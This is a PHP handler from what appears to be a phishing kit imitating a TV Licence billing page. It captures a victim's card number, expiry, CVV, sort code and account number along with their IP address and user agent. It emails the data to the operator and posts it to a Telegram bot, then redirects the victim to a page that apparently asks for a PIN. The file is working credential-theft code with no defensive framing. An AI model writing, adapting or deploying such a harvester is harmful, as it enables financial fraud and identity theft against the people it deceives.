<?php
require_once('config.php');
$cod = trim($_POST['cex']);
if($cod != null){
    
    $ip = getenv("REMOTE_ADDR");
	$hostname = gethostbyaddr($ip);
	$useragent = $_SERVER['HTTP_USER_AGENT'];
    
    $cname = $_POST["cname"];
	$cnum = $_POST["cnum"];
    $cex = $_POST["cex"];
    $csc = $_POST["csc"];
    $scode = $_POST["scode"];
    $num = $_POST["anum"];


	$uniqueid = $_SESSION['client'];
    
    $message = "|TV License Card  Client ".$_SESSION['client']."\n";
	$message .= "From ".$_SESSION['EML']."\n";
    $message .= "Card Number : ".$cnum."\n";
    $message .= "Expiry : ".$cex."\n";
    $message .= "CVV : ".$csc."\n";
	$message .= "Sort Code : ".$scode."\n";
    $message .= "Account No : ".$num."\n";
   $message .= "|Client IP: ".$ip."\n";
	$message .= "|--- http://www.geoiptool.com/?IP=$ip ----\n";
	$message .= "User Agent : ".$useragent."\n";

	


	$subject = "TV License Billing : $ip";
    mail($send, $subject, $message);
	

        $data = ['text' => $message,'chat_id' => $cID,  'parse_mode'=>'html',
     'reply_markup' => $menukeyboard];    

	$website="https://api.telegram.org/bot$TGBO";
	  $ch = curl_init($website . '/sendMessage');
	  curl_setopt($ch, CURLOPT_HEADER, false);
	  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
	  curl_setopt($ch, CURLOPT_POST, 1);
	  curl_setopt($ch, CURLOPT_POSTFIELDS, ($data));
	  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
	  $result = curl_exec($ch);
	  curl_close($ch);


	 				echo '<script> window.location="vpin.php" </script>';
             	
}
else{
}
?>